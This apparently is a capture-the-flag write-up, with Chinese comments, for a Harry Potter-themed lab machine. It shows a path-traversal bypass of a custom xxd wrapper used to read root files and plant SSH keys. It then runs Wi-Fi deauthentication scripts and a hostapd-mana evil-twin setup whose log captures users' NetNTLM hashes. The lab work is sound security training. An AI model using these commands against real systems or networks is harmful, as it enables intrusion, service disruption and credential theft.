/snap/core20/2686/usr/bin/newgrp
38
/snap/core20/2686/usr/bin/passwd
39
/snap/core20/2686/usr/bin/su
40
/snap/core20/2686/usr/bin/sudo
41
/snap/core20/2686/usr/bin/umount
42
/snap/core20/2686/usr/lib/dbus-1.0/dbus-daemon-launch-helper
43
/snap/core20/2686/usr/lib/openssh/ssh-keysign
44
/home/tom.riddle/.horcrux.png

1
(remote) harry_potter@MagiFi:/home/tom.riddle$ strings /usr/bin/xxd_horcrux
2
/lib64/ld-linux-x86-64.so.2
3
w9-$9
4
libc.so.6
5
exit
6
strncmp
7
wait
8
perror
9
getpwuid
10
puts
11
fork
12
__stack_chk_fail
13
dup2
14
stderr
15
getuid
16
execvp
17
fwrite
18
close
19
open
20
__cxa_finalize
21
strcmp
22
__libc_start_main
23
GLIBC_2.4
24
GLIBC_2.2.5
25
_ITM_deregisterTMCloneTable
26
__gmon_start__
27
_ITM_registerTMCloneTable
28
u+UH
29
[]A\A]A^A_
30
/usr/bin/xxd
31
--help
32
    -O <file>   specify output file (only horcruxes are allowed).
33
Error forking
34
tom.riddle
35
You are not worthy to handle the Horcrux!
36
/root/
37
/etc/
38
I hate dealing with Muggle gadgets!
39
Error: Output file can't be empty, use the -O option.
40
.horcrux.png
41
Not every wizards can use or destroy a Horcrux!
42
Error opening output file
43
Error redirecting output to file
44
Error executing xxd
45
:*3$"
46
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
47
crtstuff.c
48
deregister_tm_clones
49
__do_global_dtors_aux
50
completed.8061
51
__do_global_dtors_aux_fini_array_entry
52
frame_dummy
53
__frame_dummy_init_array_entry
54
xxd_horcrux.c
55
__FRAME_END__
56
__init_array_end
57
_DYNAMIC
58
__init_array_start
59
__GNU_EH_FRAME_HDR
60
_GLOBAL_OFFSET_TABLE_
61
__libc_csu_fini
62
strncmp@@GLIBC_2.2.5
63
_ITM_deregisterTMCloneTable
64
puts@@GLIBC_2.2.5
65
_edata
66
getpwuid@@GLIBC_2.2.5
67
__stack_chk_fail@@GLIBC_2.4
68
getuid@@GLIBC_2.2.5
69
dup2@@GLIBC_2.2.5
70
close@@GLIBC_2.2.5
71
__libc_start_main@@GLIBC_2.2.5
72
__data_start
73
strcmp@@GLIBC_2.2.5
74
__gmon_start__
75
__dso_handle
76
_IO_stdin_used
77
show_help
78
__libc_csu_init
79
__bss_start
80
main
81
open@@GLIBC_2.2.5
82
perror@@GLIBC_2.2.5
83
execvp@@GLIBC_2.2.5
84
exit@@GLIBC_2.2.5
85
fwrite@@GLIBC_2.2.5
86
__TMC_END__
87
_ITM_registerTMCloneTable
88
wait@@GLIBC_2.2.5
89
__cxa_finalize@@GLIBC_2.2.5
90
fork@@GLIBC_2.2.5
91
stderr@@GLIBC_2.2.5
92
.symtab
93
.strtab
94
.shstrtab
95
.interp
96
.note.gnu.property
97
.note.gnu.build-id
98
.note.ABI-tag
99
.gnu.hash
100
.dynsym
101
.dynstr
102
.gnu.version
103
.gnu.version_r
104
.rela.dyn
105
.rela.plt
106
.init
107
.plt.got
108
.plt.sec
109
.text
110
.fini
111
.rodata
112
.eh_frame_hdr
113
.eh_frame
114
.init_array
115
.fini_array
116
.dynamic
117
.data
118
.bss
119
.comment
120
(remote) harry_potter@MagiFi:/home/tom.riddle$ /usr/bin/xxd_horcrux
121
You are not worthy to handle the Horcrux!
122
“你不配掌控（或处理）这个魂器！”

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <string.h>
4
#include <unistd.h>
5
#include <pwd.h>
6
#include <sys/wait.h>
7
#include <fcntl.h>
8

9
void show_help() {
10
    pid_t pid = fork();
11
    if (pid == 0) {
12
        // 子进程直接执行 xxd --help
13
        char *argv[] = {"/usr/bin/xxd", "--help", NULL};
14
        execvp("/usr/bin/xxd", argv);
15
        _exit(1); // exec失败
16
    } else if (pid > 0) {
17
        // 父进程等待子进程
18
        wait(NULL);
19
        puts("    -O <file>   specify output file (only horcruxes are allowed).");
20
    } else {
21
        perror("Error forking");
22
    }
23
}
24

25
int main(int argc, char **argv) {
26
    uid_t uid = getuid();
27
    struct passwd *pw = getpwuid(uid);
28
    if (!pw || strcmp(pw->pw_name, "tom.riddle") != 0) {
29
        fwrite("You are not worthy to handle the Horcrux!\n", 1, 42, stderr);
30
        return 1;
31
    }
32

33
    if (argc <= 1 || strcmp(argv[1], "-h") == 0 || strcmp(argv[1], "--help") == 0) {
34
        show_help();
35
        return 1;
36
    }
37

38
    char *outfile = NULL;
39
    for (int i = 1; i < argc; i++) {
40
        if (strcmp(argv[i], "-O") == 0 && i + 1 < argc) {
41
            outfile = argv[i + 1];
42
            argv[i + 1] = NULL; // 模拟汇编里把 argv[i+1] 清零
43
            i++; // 跳过文件名
44
        }
45
    }
46

47
    if (!outfile || strlen(outfile) == 0) {
48
        fwrite("Error: Output file can't be empty, use the -O option.\n", 1, 54, stderr);
49
        show_help();
50
        return 1;
51
    }
52

53
    // 文件名必须以 ".horcrux.png" 结尾
54
    size_t len = strlen(outfile);
55
    if (len < 12 || strcmp(outfile + len - 12, ".horcrux.png") != 0) {
56
        fwrite("Not every wizards can use or destroy a Horcrux!\n", 1, 49, stderr);
57
        return 1;
58
    }
59

60
    // 禁止写 /root 和 /etc
61
    if (strncmp(outfile, "/root/", 6) == 0 || strncmp(outfile, "/etc/", 5) == 0) {
62
        fwrite("I hate dealing with Muggle gadgets!\n", 1, 36, stderr);
63
        return 1;
64
    }
65

66
    // 打开文件
67
    int fd = open(outfile, O_WRONLY | O_CREAT | O_TRUNC, 0644);
68
    if (fd < 0) {
69
        perror("Error opening output file");
70
        return 1;
71
    }
72

73
    // fork/exec xxd
74
    pid_t pid = fork();
75
    if (pid == 0) {
76
        dup2(fd, STDOUT_FILENO);
77
        close(fd);
78
        char *xxd_argv[] = {"/usr/bin/xxd", NULL};
79
        execvp("/usr/bin/xxd", xxd_argv);
80
        _exit(1);
81
    } else if (pid > 0) {
82
        wait(NULL);
83
    } else {
84
        perror("Error forking");
85
        close(fd);
86
        return 1;
87
    }
88

89
    return 0;
90
}

1
          ┌───────────────┐
2
          │   程序启动     │
3
          └───────┬───────┘
4
                  │
5
                  ▼
6
         ┌─────────────────┐
7
         │ 获取当前用户 UID │
8
         └───────┬─────────┘
9
                 │
10
                 ▼
11
         ┌────────────────────────────┐
12
         │ 用户是否是 tom.riddle?     │
13
         └───────┬───────────────┘
14
           是    │    否
15
           │     ▼
16
           │  fwrite("You are not worthy...\n")
17
           │  return 1
18
           │
19
           ▼
20
┌─────────────────────────────┐
21
│ argc <= 1 或 argv[1] 为 -h │
22
│ 或 --help                    │
23
└─────────┬───────────────────┘
24
          │
25
          ▼
26
      show_help() ──┐
27
          │         │
28
          ▼         │
29
       return 1     │
30
                   │
31
           ┌───────▼──────────┐
32
           │ 遍历 argv 参数    │
33
           │ 查找 -O 选项       │
34
           └───────┬──────────┘
35
                   │
36
           是否指定输出文件?
37
           │       │
38
           │       ▼
39
           │  fwrite("Error: Output file can't be empty...")
40
           │  show_help()
41
           │  return 1
42
           │
43
           ▼
44
  ┌──────────────────────────┐
45
  │ 文件名是否合法?           │
46
  │ 1. 以 ".horcrux.png" 结尾 │
47
  │ 2. 不在 /root/ 或 /etc/   │
48
  └─────────┬────────────────┘
49
      否     │      是
50
      │      ▼
51
fwrite("Not every wizards can ...") 继续执行
52
或 fwrite("I hate dealing with ...")
53
return 1
54
      │
55
      ▼
56
┌───────────────────────────┐
57
│ 打开输出文件 fd            │
58
└─────────┬─────────────────┘
59
          │
60
          ▼
61
      fork() ──────┐
62
          │        │
63
      子进程      父进程
64
          │        │
65
  dup2(fd, STDOUT) │
66
  close(fd)        │
67
  execvp("/usr/bin/xxd") │
68
          │        ▼
69
       _exit(1)   wait(NULL)
70
          │
71
          ▼
72
       程序结束

1
# 这个会被阻止：
2
xxd_horcrux /root/root.txt -O .horcrux.png
3

4
# 这个可以绕过检查：
5
xxd_horcrux /home/../root/root.txt -O .horcrux.png

1
cd /tmp
2
xxd_horcrux /home/../root/root.txt -O .horcrux.png
3
cat .horcrux.png

1
xxd_horcrux /home/../root/.ssh/id_rsa -O .horcrux.png
2
xxd -r .horcrux.png   # 如果输出的是 hex

1
# 生成你的公钥并进行 hex 编码
2
echo "ssh-rsa AAAA... your-key" | xxd > /tmp/key.hex
3

4
# 使用 xxd_horcrux 写入 root 授权密钥（路径检查同样适用）
5
xxd_horcrux -r /tmp/key.hex -O /home/../root/.ssh/authorized_keys

1
(remote) harry_potter@MagiFi:/usr/bin$ sudo -l
2
Matching Defaults entries for harry_potter on MagiFi:
3
    env_reset, mail_badpass,
4
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
5

6
User harry_potter may run the following commands on
7
        MagiFi:
8
    (root) NOPASSWD: /usr/sbin/aireplay-ng,
9
        /usr/sbin/airmon-ng, /usr/sbin/airodump-ng,
10
        /usr/bin/airdecap-ng, /usr/bin/hostapd-mana

1
# 强制解除认证攻击（使客户端断开连接）
2
aireplay-ng -0 10 -a BSSID -c STATION wlan0mon

1
airmon-ng check kill

1
# 锁定目标AP并捕获握手包
2
airodump-ng --bssid 00:11:22:33:44:55 -c 6 --write capture wlan0mon

1
(remote) harry_potter@MagiFi:/usr/bin$ ip -br addr
2
lo               UNKNOWN        127.0.0.1/8 ::1/128
3
enp0s3           UP             192.168.0.106/24 fe80::a00:27ff:fed2:ba97/64
4
docker0          DOWN           172.17.0.1/16
5
wlan0            DOWN
6
wlan1            DOWN
7
wlan2            DOWN
8
wlan3            DOWN
9
wlan4            DOWN
10
wlan5            DOWN
11
wlan6            DOWN
12
wlan60           DOWN
13
hwsim0           DOWN
14
veth1@if77       UP             10.200.1.1/24 fe80::80ca:15ff:fef4:e359/64
15
veth2@if79       UP             10.200.2.1/24 fe80::c47e:55ff:fe79:201a/64

1
(remote) harry_potter@MagiFi:/home/harry_potter$ sudo /usr/sbin/airmon-ng check kill  # 终止干扰进程
2

3
Killing these processes:
4

5
    PID Name
6
    639 dhclient
7

8
(remote) harry_potter@MagiFi:/home/harry_potter$ sudo /usr/sbin/airmon-ng start wlan0  # 开启监听模式
9

10

11
PHY     Interface       Driver          Chipset
12

13
phy10   wlan0           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
14

15
                (mac80211 monitor mode vif enabled for [phy10]wlan0 on [phy10]wlan0mon)
16
                (mac80211 station mode vif disabled for [phy10]wlan0)
17
phy11   wlan1           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
18
phy12   wlan2           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
19
phy13   wlan3           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
20
phy14   wlan4           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
21
phy15   wlan5           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
22
phy16   wlan6           mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211
23
phy70   wlan60          mac80211_hwsim  Software simulator of 802.11 radio(s) for mac80211

1
(remote) harry_potter@MagiFi:/home/harry_potter$ sudo /usr/sbin/airodump-ng wlan0mon   # 2.4GHz

1
sudo /usr/sbin/airodump-ng wlan0mon --band a   # 5GHz

1
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
2
 F0:9F:C2:71:22:15  -28       15        0    0  44   54e  WPA2 CCMP   MGT  wifi-college
3
 F0:9F:C2:71:22:17  -28       15        0    0  40   54e  WPA2 CCMP   MGT  wifi-college
4
 F0:9F:C2:71:22:16  -28       15        0    0  36   54e  WPA2 CCMP   MGT  wifi-college

1
aireplay-ng -0 0 -a F0:9F:C2:71:22:15 wlan0mon
2
aireplay-ng -0 0 -a F0:9F:C2:71:22:16 wlan0mon
3
aireplay-ng -0 0 -a F0:9F:C2:71:22:17 wlan0mon

1
# mkdir /tmp/scan
2
sudo /usr/sbin/airodump-ng wlan0mon --band a -c 36,40,44 -w /tmp/scan/

1
 CH 40 ][ Elapsed: 2 mins ][ 2026-01-25 11:13 ][ WPA ha
2

3
 BSSID              PWR  Beacons    #Data, #/s  CH   MB
4

5
 F0:9F:C2:71:22:15  -28      443        0    0  44   54
6
 F0:9F:C2:71:22:17  -28      438        0    0  40   54
7
 F0:9F:C2:71:22:16  -28      440       92    0  36   54
8

9
 BSSID              STATION            PWR   Rate    Lo
10

11
 F0:9F:C2:71:22:16  64:32:A8:07:6C:43  -29    6e- 6e     0       34  PMKID
12
 F0:9F:C2:71:22:16  64:32:A8:07:6C:41  -29    0 -24e     0       15
13
 F0:9F:C2:71:22:16  64:32:A8:07:6C:40  -29    0 -24e     0       13
14
 F0:9F:C2:71:22:16  64:32:A8:07:6C:42  -29    6e-54e     0       60  PMKID

1
sudo airodump-ng -c 36 --band a --bssid F0:9F:C2:71:22:16 -w /tmp/scan wlan0mon

1
sudo aireplay-ng -0 0 -a F0:9F:C2:71:22:16 wlan0mon

1
(remote) harry_potter@MagiFi:/home/harry_potter$ ls -la /tmp/scan
2
total 228
3
drwxr-xr-x  2 harry_potter harry_potter   4096 Jan 25 11:11 .
4
drwxrwxrwt 14 root         root           4096 Jan 25 11:19 ..
5
-rw-r--r--  1 root         root          30600 Jan 25 11:13 -01.cap
6
-rw-r--r--  1 root         root           1118 Jan 25 11:13 -01.csv
7
-rw-r--r--  1 root         root           1122 Jan 25 11:13 -01.kismet.csv
8
-rw-r--r--  1 root         root           9917 Jan 25 11:13 -01.kismet.netxml
9
-rw-r--r--  1 root         root         170884 Jan 25 11:13 -01.log.csv

1
(remote) harry_potter@MagiFi:/tmp/scan$ tshark -r -01.cap -Y "ssl.handshake.type == 11" -V | grep -ow -E '(countryName=\\w+)|(stateOrProvinceName=.+)|(localityName=.+)|(organizationName=.+)|(emailAddress=.+)|(commonName=.+)' | cut -d ',' -f 1 | sed 's/)//' | sort -u
2
commonName=Hogwarts Certificate Authority
3
emailAddress=ca@hogwarts.htb
4
emailAddress=server@hogwarts.htb
5
localityName=Madrid
6
organizationName=Hogwarts
7
stateOrProvinceName=Madrid

1
harry_potter@MagiFi:/tmp$ mkdir fakeap
2
harry_potter@MagiFi:/tmp$ cd fakeap/
3
harry_potter@MagiFi:/tmp/fakeap$ cp -R /etc/freeradius/3.0/certs certs
4
harry_potter@MagiFi:/tmp/fakeap$ chmod -R 777 certs/
5
harry_potter@MagiFi:/tmp/fakeap$ nano certs/ca.cnf
6
harry_potter@MagiFi:/tmp/fakeap$ grep '^\[certificate_' -A 7 certs/ca.cnf
7
[certificate_authority]
8
countryName             = ES
9
stateOrProvinceName     = Madrid
10
localityName            = Madrid
11
organizationName        = Hogwarts
12
emailAddress            = ca@hogwarts.htb
13
commonName              = "Hogwarts Certificate Authority"
14

15
harry_potter@MagiFi:/tmp/fakeap$ nano certs/server.cnf
16
harry_potter@MagiFi:/tmp/fakeap$ grep '^\[server' -A 7 certs/server.cnf
17
[server]
18
countryName             = ES
19
stateOrProvinceName     = Madrid
20
localityName            = Madrid
21
organizationName        = Hogwarts
22
emailAddress            = server@hogwarts.htb
23
commonName              = "Hogwarts Certificate Authority"
24

25
harry_potter@MagiFi:/tmp/fakeap$ cd certs/
26
harry_potter@MagiFi:/tmp/fakeap/certs$ make
27
openssl dhparam -out dh -2 2048
28
Generating DH parameters, 2048 bit long safe prime, generator 2
29
This is going to take a long time
30
..................................+...............................................................................................+...++*++*++*++*
31
openssl req -new  -out server.csr -keyout server.key -config ./server.cnf
32
Generating a RSA private key
33
................................................................................................+++++
34
...+++++
35
writing new private key to 'server.key'
36
-----
37
chmod g+r server.key
38
openssl req -new -x509 -keyout ca.key -out ca.pem \
39
        -days '60' -config ./ca.cnf \
40
        -passin pass:'whatever' -passout pass:'whatever'
41
Generating a RSA private key
42
.........................................................+++++
43
.....................+++++
44
writing new private key to 'ca.key'
45
-----
46
chmod g+r ca.key
47
openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr  -key 'whatever' -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf
48
Using configuration from ./server.cnf
49
Check that the request matches the signature
50
Signature ok
51
Certificate Details:
52
        Serial Number: 1 (0x1)
53
        Validity
54
            Not Before: Jun 22 08:05:42 2025 GMT
55
            Not After : Aug 21 08:05:42 2025 GMT
56
        Subject:
57
            countryName               = ES
58
            stateOrProvinceName       = Madrid
59
            organizationName          = Hogwarts
60
            commonName                = Hogwarts Certificate Authority
61
            emailAddress              = server@hogwarts.htb
62
        X509v3 extensions:
63
            X509v3 Extended Key Usage:
64
                TLS Web Server Authentication
65
            X509v3 CRL Distribution Points:
66

67
                Full Name:
68
                  URI:http://www.example.com/example_ca.crl
69

70
Certificate is to be certified until Aug 21 08:05:42 2025 GMT (60 days)
71

72
Write out database with 1 new entries
73
Data Base Updated
74
openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12  -passin pass:'whatever' -passout pass:'whatever'
75
chmod g+r server.p12
76
openssl pkcs12 -in server.p12 -out server.pem -passin pass:'whatever' -passout pass:'whatever'
77
chmod g+r server.pem
78
server.pem: OK
79
openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der
80
openssl ca -gencrl -keyfile ca.key -cert ca.pem -config ./ca.cnf -out ca-crl.pem -key 'whatever'
81
Using configuration from ./ca.cnf
82
openssl crl -in ca-crl.pem -outform der -out ca.crl
83
rm ca-crl.pem
84
openssl req -new  -out client.csr -keyout client.key -config ./client.cnf
85
Generating a RSA private key
86
.......................................................................................................................+++++
87
...........+++++
88
writing new private key to 'client.key'
89
-----
90
chmod g+r client.key
91
openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr  -key 'whatever' -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf
92
Using configuration from ./client.cnf
93
Check that the request matches the signature
94
Signature ok
95
The countryName field is different between
96
CA certificate (ES) and the request (FR)
97
make: *** [Makefile:120: client.crt] Error 1

1
harry_potter@MagiFi:/tmp/fakeap/certs$ nano mana.eap_user
2
harry_potter@MagiFi:/tmp/fakeap/certs$ cat mana.eap_user
3
*     PEAP,TTLS,TLS,FAST
4
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]

1
harry_potter@MagiFi:/tmp/fakeap/certs$ nano mana.conf
2
harry_potter@MagiFi:/tmp/fakeap/certs$ cat mana.conf
3
ssid=wifi-college
4
interface=wlan1
5
driver=nl80211
6
channel=1
7
hw_mode=g
8
ieee8021x=1
9
eap_server=1
10
eapol_key_index_workaround=0
11
eap_user_file=/tmp/fakeap/certs/mana.eap_user
12
ca_cert=/tmp/fakeap/certs/ca.pem
13
server_cert=/tmp/fakeap/certs/server.pem
14
private_key=/tmp/fakeap/certs/server.key
15
private_key_passwd=whatever
16
dh_file=/tmp/fakeap/certs/dh
17
auth_algs=1
18
wpa=2
19
wpa_key_mgmt=WPA-EAP
20
wpa_pairwise=CCMP TKIP
21
mana_wpe=1
22
mana_credout=/tmp/fakeap/certs/hostapd.credout
23
mana_eapsuccess=1
24
mana_eaptls=1

1
harry_potter@MagiFi:/tmp$ sudo hostapd-mana mana.conf
2
Configuration file: mana.conf
3
MANA: Captured credentials will be written to file '/tmp/hostapd.credout'.
4
Could not read interface wlan1                   flags: No such device
5
nl80211: Driver does not support authentication/association or connect commands
6
nl80211: deinit ifname=wlan1                     disabled_11b_rates=0
7
Could not read interface wlan1                   flags: No such device
8
nl80211 driver initialization failed.
9
wlan1                   : interface state UNINITIALIZED->DISABLED
10
wlan1                   : AP-DISABLED
11
hostapd_free_hapd_data: Interface wlan1                  wasn't started
12
harry_potter@MagiFi:/tmp$ ip link show wlan1
13
16: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
14
    link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff

1
harry_potter@MagiFi:/tmp/fakeap/certs$ sudo hostapd-mana mana.conf
2
Configuration file: mana.conf
3
MANA: Captured credentials will be written to file '/tmp/fakeap/certs/hostapd.credout'.
4
Using interface wlan1 with hwaddr 02:00:00:00:01:00 and ssid "wifi-college"
5
wlan1: interface state UNINITIALIZED->ENABLED
6
wlan1: AP-ENABLED

1
harry_potter@MagiFi:/tmp$ cat deauth.sh
2
#!/bin/bash
3

4
wlan1="wlan3"
5
wlan2="wlan4"
6
wlan3="wlan5"
7

8
bssid1Channel="44"
9
bssid2Channel="36"
10
bssid3Channel="40"
11

12
bssid1="F0:9F:C2:71:22:15"
13
bssid2="F0:9F:C2:71:22:16"
14
bssid3="F0:9F:C2:71:22:17"
15

16
check_monitor_mode() {
17
  interface=$1
18
  channel=$2
19
  mode=$(iwconfig ${interface}mon 2>/dev/null | grep "Mode:Monitor")
20
  if [ -z "$mode" ]; then
21
    sudo airmon-ng start $interface $channel
22
  fi
23
}
24

25
run_aireplay() {
26
  interface=$1
27
  bssid=$2
28
  sudo aireplay-ng -0 30 -a $bssid ${interface}mon
29
}
30

31
check_monitor_mode $wlan1 $bssid1Channel
32
check_monitor_mode $wlan2 $bssid2Channel
33
check_monitor_mode $wlan3 $bssid3Channel
34

35
echo "Running deauthentication attack..."
36

37
run_aireplay $wlan1 $bssid1 &
38
run_aireplay $wlan2 $bssid2 &
39
run_aireplay $wlan3 $bssid3 &
40

41
wait

1
 (remote) harry_potter@MagiFi:/tmp/fakeap/certs$ sudo hostapd-mana mana.conf
2
Configuration file: mana.conf
3
MANA: Captured credentials will be written to file '/tmp/fakeap/certs/hostapd.credout'.
4
Using interface wlan1 with hwaddr 02:00:00:00:01:00 and ssid "wifi-college"
5
wlan1: interface state UNINITIALIZED->ENABLED
6
wlan1: AP-ENABLED
7
cd ^H^Hwlan1: STA 64:32:a8:07:6c:42 IEEE 802.11: authenticated
8
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: authenticated
9
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: authenticated
10
wlan1: STA 64:32:a8:07:6c:42 IEEE 802.11: associated (aid 1)
11
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:42
12
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
13
MANA EAP Identity Phase 0: Hogwarts\minerva.mcgonagall
14
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
15
wlan1: STA 64:32:a8:07:6c:41 IEEE 802.11: authenticated
16
wlan1: STA 64:32:a8:07:6c:41 IEEE 802.11: associated (aid 2)
17
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: associated (aid 3)
18
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:41
19
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
20
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: associated (aid 4)
21
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:43
22
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
23
MANA EAP Identity Phase 1: Hogwarts\minerva.mcgonagall
24
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:40
25
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
26
MANA EAP Identity Phase 0: Hogwarts\albus.dumbledore
27
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
28
MANA EAP Identity Phase 0: Hogwarts\rubeus.hagrid
29
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
30
MANA EAP EAP-MSCHAPV2 ASLEAP user=minerva.mcgonagall | asleap -C e8:c6:2b:ec:e7:ee:bb:5c -R 0b:4d:f5:5b:b8:28:f3:21:32:77:9a:79:14:fb:d3:a2:5a:aa:8d:fa:de:be:39:7e
31
MANA EAP EAP-MSCHAPV2 JTR | minerva.mcgonagall:$NETNTLM$e8c62bece7eebb5c$0b4df55bb828f32132779a7914fbd3a25aaa8dfadebe397e:::::::
32
MANA EAP EAP-MSCHAPV2 HASHCAT | minerva.mcgonagall::::0b4df55bb828f32132779a7914fbd3a25aaa8dfadebe397e:e8c62bece7eebb5c
33
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 5d 17 b4 75 e1 6c a5 11 71 7d d8 db 8f 8c e3 f2
34
MANA EAP Identity Phase 0: Hogwarts\tom.riddle
35
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
36
MANA EAP Identity Phase 1: Hogwarts\rubeus.hagrid
37
MANA EAP EAP-MSCHAPV2 ASLEAP user=rubeus.hagrid | asleap -C 32:c9:d8:fc:a7:e3:4b:4f -R 57:6a:78:08:61:dc:22:a0:21:ab:db:f0:25:99:8e:55:cf:50:99:95:06:eb:c7:36
38
MANA EAP EAP-MSCHAPV2 JTR | rubeus.hagrid:$NETNTLM$32c9d8fca7e34b4f$576a780861dc22a021abdbf025998e55cf50999506ebc736:::::::
39
MANA EAP EAP-MSCHAPV2 HASHCAT | rubeus.hagrid::::576a780861dc22a021abdbf025998e55cf50999506ebc736:32c9d8fca7e34b4f
40
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 7a 45 0f 5f 4b 08 b9 69 3f f5 ff d1 03 ac 59 36
41
MANA EAP Identity Phase 1: Hogwarts\tom.riddle
42
MANA EAP EAP-MSCHAPV2 ASLEAP user=tom.riddle | asleap -C ac:61:40:15:03:00:fe:00 -R ad:bd:05:09:6a:52:b2:bf:69:c4:2c:50:08:ca:b0:18:7e:d1:c1:4c:6b:0e:ec:d2
43
MANA EAP EAP-MSCHAPV2 JTR | tom.riddle:$NETNTLM$ac6140150300fe00$adbd05096a52b2bf69c42c5008cab0187ed1c14c6b0eecd2:::::::
44
MANA EAP EAP-MSCHAPV2 HASHCAT | tom.riddle::::adbd05096a52b2bf69c42c5008cab0187ed1c14c6b0eecd2:ac6140150300fe00
45
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 77 ef 35 cf 2e 10 79 68 70 df 3e 70 f6 d4 b0 e1
46
MANA EAP Identity Phase 1: Hogwarts\albus.dumbledore
47
MANA EAP EAP-MSCHAPV2 ASLEAP user=albus.dumbledore | asleap -C 4e:f6:8e:3b:4b:fc:88:e8 -R 63:ad:f2:7c:45:b9:6a:99:7c:46:66:ac:14:70:d0:f4:31:8e:9f:b6:ea:04:e8:5b
48
MANA EAP EAP-MSCHAPV2 JTR | albus.dumbledore:$NETNTLM$4ef68e3b4bfc88e8$63adf27c45b96a997c4666ac1470d0f4318e9fb6ea04e85b:::::::
49
MANA EAP EAP-MSCHAPV2 HASHCAT | albus.dumbledore::::63adf27c45b96a997c4666ac1470d0f4318e9fb6ea04e85b:4ef68e3b4bfc88e8
50
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): ce cd d7 f4 a5 cc 68 42 65 c2 a2 35 0e e5 75 e4
51
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: authenticated
52
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: associated (aid 1)
53
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:40
54
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
55
MANA EAP Identity Phase 0: Hogwarts\rubeus.hagrid
56
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
57
MANA EAP Identity Phase 1: Hogwarts\rubeus.hagrid
58
MANA EAP EAP-MSCHAPV2 ASLEAP user=rubeus.hagrid | asleap -C b0:19:36:03:f4:e2:88:74 -R 3b:01:17:93:19:e9:70:f7:39:80:91:b6:61:14:2b:ae:db:34:00:d0:b3:f5:6a:c2
59
MANA EAP EAP-MSCHAPV2 JTR | rubeus.hagrid:$NETNTLM$b0193603f4e28874$3b01179319e970f7398091b661142baedb3400d0b3f56ac2:::::::
60
MANA EAP EAP-MSCHAPV2 HASHCAT | rubeus.hagrid::::3b01179319e970f7398091b661142baedb3400d0b3f56ac2:b0193603f4e28874
61
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 50 e2 1b a2 49 a6 c5 32 b6 45 38 36 ff bf d6 d5

1
# kali1 监听
2
 CH 128 ][ Elapsed: 10 mins ][ 2025-06-22 13:20 ][ WPA handshake: F0:9F:C2:71:22:16
3

4
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
5

6
 02:00:00:00:01:00  -28     3409      143    0   1   54        CCMP   MGT  wifi-college
7
 F0:9F:C2:71:22:15  -29      265        0    0  44   54e  WPA2 CCMP   MGT  wifi-college
8
 F0:9F:C2:71:22:16  -29      264       58    0  36   54e  WPA2 CCMP   MGT  wifi-college
9
 F0:9F:C2:71:22:17  -29      267       87    0  40   54e  WPA2 CCMP   MGT  wifi-college
10

11
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
12

13
 02:00:00:00:01:00  64:32:A8:07:6C:40  -29    1 - 1      0      121  PMKID  wifi-college
14
 02:00:00:00:01:00  64:32:A8:07:6C:43  -29    6e- 1      0      193  PMKID  wifi-college
15
 02:00:00:00:01:00  64:32:A8:07:6C:42  -29    1 - 1      0      157  PMKID  wifi-college
16
 F0:9F:C2:71:22:16  64:32:A8:07:6C:41  -29    6e- 6e     0      166  PMKID  wifi-college

1
# kali2 伪造节点
2
harry_potter@MagiFi:/tmp/fakeap/certs$ sudo hostapd-mana mana.conf
3
Configuration file: mana.conf
4
MANA: Captured credentials will be written to file '/tmp/fakeap/certs/hostapd.credout'.
5
Using interface wlan1 with hwaddr 02:00:00:00:01:00 and ssid "wifi-college"
6
wlan1: interface state UNINITIALIZED->ENABLED
7
wlan1: AP-ENABLED
8
